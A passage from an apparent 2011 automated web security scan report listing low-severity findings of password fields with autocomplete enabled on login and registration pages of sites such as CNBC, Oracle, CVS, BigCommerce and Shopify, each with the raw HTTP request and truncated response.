                           <form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">
                            <input type="hidden" name="lt" value="_c275D0947-338E-C116-8994-90DE377A9048_kE686DA16-D014-ACCF-07D2-726F8B6163E2" />
...[SNIP]...
<div class="inputDiv">

                                    <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>
                               
</div>
...[SNIP]...

14.8. https://oracleus.wingateweb.com/portal/newreg.ww

Summary

Severity:   Low
Confidence:   Certain
Host:   https://oracleus.wingateweb.com
Path:   /portal/newreg.ww

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /portal/newreg.ww?brand=jone&eve=ow&wt=ow HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:14 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Connection: Keep-Alive
Content-Length: 11209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="expir
...[SNIP]...
</p>

<form name="loginForm" method="post" action="/portal/processLogin.ww" id="loginForm">
   <fieldset>
...[SNIP]...
</label>
           <input type="password" name="password" value="" />
       </div>
...[SNIP]...

14.9. https://register.cnbc.com/createUser.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /createUser.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /createUser.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:45 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/
Content-Length: 54215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<div id="mainContent" class="mainContent" align="left">
<form name="userBasicRegistrationForm" method="post" action="/createUser.do">
   <input type="hidden" name="international" value="" id="international">
...[SNIP]...
<div class="inputDiv">
<input type="password" name="password" maxlength="20" value="" onfocus="this.className='current';
document.getElementById('pwdInfo').style.visibility = 'visible';
document.getElementById('pwdInfo').style.display = 'block';
toggleMessage('pwdChecking', 'pwdSuccess', 'pwdError');
document.getElementById('pwdChecking').style.display = 'none';
document.getElementById('pwdChecking').style.visibility = 'hidden';" id="password" class="notVisited">

</div>
...[SNIP]...
<div class="inputDiv">
<input type="password" name="passwordConfirm" value="" onblur="this.className='doneWith';confirmPassword(this);" onfocus="this.className='current';hideThem('pwdRight', 'pwdWrong');" class="notVisited">
</div>
...[SNIP]...

14.10. https://register.cnbc.com/registerUser.do

Summary

Severity:   Low
Confidence:   Certain
Host:   https://register.cnbc.com
Path:   /registerUser.do

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /registerUser.do?iframe=yes&source=register HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/
Content-Length: 53350


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<div id="mainContent" class="mainContent" align="left">
<form name="userBasicRegistrationForm" method="post" action="/createUser.do">
   <input type="hidden" name="international" value="" id="international">
...[SNIP]...
<div class="inputDiv">
<input type="password" name="password" maxlength="20" value="" onfocus="this.className='current';
document.getElementById('pwdInfo').style.visibility = 'visible';
document.getElementById('pwdInfo').style.display = 'block';
toggleMessage('pwdChecking', 'pwdSuccess', 'pwdError');
document.getElementById('pwdChecking').style.display = 'none';
document.getElementById('pwdChecking').style.visibility = 'hidden';" id="password" class="notVisited">

</div>
...[SNIP]...
<div class="inputDiv">
<input type="password" name="passwordConfirm" value="" onblur="this.className='doneWith';confirmPassword(this);" onfocus="this.className='current';hideThem('pwdRight', 'pwdWrong');" class="notVisited">
</div>
...[SNIP]...

14.11. https://www.atg.com/service/main.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.atg.com
Path:   /service/main.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:37:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:37:31 GMT
Content-Length: 62157
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!-- $Id: //application/service/version/9.1/SelfService/src/web-apps/SelfSe
...[SNIP]...
<div class="panelContent" id="loginContent">
       
       
        We may have more answers relevant to your search. Please log in below, so we can customize your search results.
        <form action="/service/main.jsp?t=homeTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&_DARGS=/service/panels/loginPanel.jsp.login" method="post"><div>
...[SNIP]...
<dd>
                <input value="" maxlength="50" type="password" name="/atg/svc/self/ui/formhandlers/SelfServiceProfileFormHandler.value.password" id="password"/><input value=" " type="hidden" name="_D:/atg/svc/self/ui/formhandlers/SelfServiceProfileFormHandler.value.password"/>
...[SNIP]...

14.12. http://www.bigcommerce.com/freetrial.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bigcommerce.com
Path:   /freetrial.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /freetrial.php HTTP/1.1
Host: www.bigcommerce.com
Proxy-Connection: keep-alive
Referer: http://www.bigcommerce.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 10579
Connection: close
Content-Type: text/html

<style>

.FreeTrialForm { background:#FFF !important; border:1px solid transparent !important; }
.FreeTrialForm p { color:black !important; }
.NoCCRequired { color:gray !important; font-weight:bold; }
...[SNIP]...
</div>
<form action="/signup.php" name="signupform" method="post" onsubmit="return CheckHPForm()" style="margin: 0px;">
   
   
                               <input type="hidden" name="roi_formpage" value="/freetrial.php" />
...[SNIP]...
<td>
               <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password" name="password"/>
               <div style="font-size: 11px; color: gray; font-style: italic;">
...[SNIP]...
<td>
               <input type="password" value="" style="margin-top: 5px; width: 98%;" id="password2" name="password2"/>
           </td>
...[SNIP]...

14.13. https://www.bigcommerce.com/login.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.bigcommerce.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/compatible-with.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413566287:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343366287:41658941.4.10.1315341506; 2__utmc=^first.1378413566287:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.9.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14684
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
<div id="LoginFormPrimary">
           <form method="post" action="/login.php">
               <fieldset>
...[SNIP]...
<dd><input type="password" class="Textbox" id="password" name="password" value="" /></dd>
...[SNIP]...

14.14. https://www.cvs.com/CVSApp/user/login.jsp

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.cvs.com
Path:   /CVSApp/user/login.jsp

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832 HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:29 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC91c2VyL2xvZ2luLmpzcA..
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:29 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Length: 47742


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<td align="left">


<form action="login.jsp?_DARGS=/CVSApp/user/login.jsp" method="post"><input name="_dyncharset" value="ISO-8859-1" type="hidden">
...[SNIP]...
<p>
<input id="password" maxlength="25" name="/atg/userprofiling/ProfileFormHandler.value.password" value="" type="password" size="25"><input name="_D:/atg/userprofiling/ProfileFormHandler.value.password" value=" " type="hidden">
...[SNIP]...

14.15. http://www.fetchback.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:47:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 26 Aug 2011 14:37:11 GMT
Accept-Ranges: bytes
Content-Length: 9526
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 15:47:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="fHolder">
   <form name="fetchback" id="fetchback" method="post" action="https://fido.fetchback.com/fido/j_spring_security_check" class="client_login">
<input name="j_username" type="text" class="userfield" value="username" onfocus="this.select();" />
...[SNIP]...
<input type="hidden" name="_spring_security_remember_me" value="true"/>
<input name="j_password" id="j_password" type="password" value="password" class="userfield" onfocus="this.select();" onkeypress="l_keypress(event);" />
<a href="#" id="go" onclick="javascript:document.getElementById('fetchback').submit();return false;" onmouseover="goBtn.src='hpimages/button_go_clientlogin2.jpg';" onmouseout="goBtn.sr
...[SNIP]...

14.16. http://www.oraclecfo.com/Authentication/Login_w.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Authentication/Login_w.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA== HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; OracleCFOCountry=282; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:11:22 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 19964


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->
   
<form name="CFOForm" method="post" action="/Authentication/Login_w.html?url=LwAAAG8AAAByAAAAYQAAAGMAAABsAAAAZQAAADAAAAA5AAAALgAAAGkAAABjAAAAbwAAAA==" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_cphPlaceholder_ctl00_btnLogin')" id="CFOForm">
<div>
...[SNIP]...
<dd class="floatright clearRight" style="margin-bottom: 0;">
                                   <input name="ctl00$cphPlaceholder$ctl00$txtPassword" type="password" id="ctl00_cphPlaceholder_ctl00_txtPassword" class="mandatory xlgTextbox" />
                               </dd>
...[SNIP]...

14.17. http://www.oraclecfo.com/Main/Home/Home_w.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Main/Home/Home_w.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Main/Home/Home_w.html HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/index.html#
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:10:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 52760


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->

<form name="CFOForm" method="post" action="/Main/Home/Home_w.html" id="CFOForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" />
</li>
...[SNIP]...

14.18. http://www.oraclecfo.com/Main/Solutions/Solutions_w.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oraclecfo.com
Path:   /Main/Solutions/Solutions_w.html

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /Main/Solutions/Solutions_w.html?mode=1&articleID=2243&categoryID=82 HTTP/1.1
Host: www.oraclecfo.com
Proxy-Connection: keep-alive
Referer: http://www.oraclecfo.com/Main/Home/Home_w.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hbwp4rmax55h0c45eof5yo45; _pk_ref.3.469e=%5B%22%22%2C%22%22%2C1315343453%2C%22http%3A%2F%2Fwww.oracle.com%2Findex.html%23%22%5D; _pk_id.3.469e=39092d4d809db2e1.1315343453.1.1315343453.1315343453; _pk_ses.3.469e=*; OracleCFOCountry=282; OracleCFOLanguage=46; OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:12:24 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: OracleCFOCountry=282; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOLanguage=46; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: OracleCFOGuid=b70d9a30-9027-4ebd-9db2-d8024f4ab01c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 50539


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...
<![endif]-->
   
<form name="CFOForm" method="post" action="/Main/Solutions/Solutions_w.html?mode=1&amp;articleID=2243&amp;categoryID=82" id="CFOForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$ucNavigationBar$LoginBar_w1$txtPassword" type="password" id="ctl00_ucNavigationBar_LoginBar_w1_txtPassword" class="text" />
</li>
...[SNIP]...

14.19. http://www.shopify.com/login

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shopify.com
Path:   /login

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /login HTTP/1.1
Host: www.shopify.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _y=76726C16-B1FA-490A-93B3; optimizelyEndUserId=oeu1315341237551r0.5390826954971999; wcsid=4XOE7W6GWNHMEHMYS9583VOC78556641; hblid=JAQBX9FF2NF9W8U5RWCURZAD78556641; optimizelyBuckets=%7B%7D; __utma=262205262.1105150939.1315341127.1315341127.1315341127.1; __utmb=262205262.8.10.1315341127; __utmc=262205262; __utmz=262205262.1315341127.1.1.utmgclid=CK6YvLv4iKsCFSE8gwod-iiK3g|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; olarkld=1315341237560; _oklv=1315341242826; _s=08DB14DB-F588-4766-8659; __ar_v4=EBPLYDUJ5RCZ3C7MBENLBV%3A20110906%3A3%7C3CUMSMM7PFGSTPKIXDFOOO%3A20110906%3A3%7C4X7ERY5MVFDBLHMTRJRP2G%3A20110906%3A1%7CRFYZ2NEPUVBUFENBCOH6GL%3A20110906%3A2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
ETag: "5e6cd1cceddc58f0b1054bb20da87a2e"
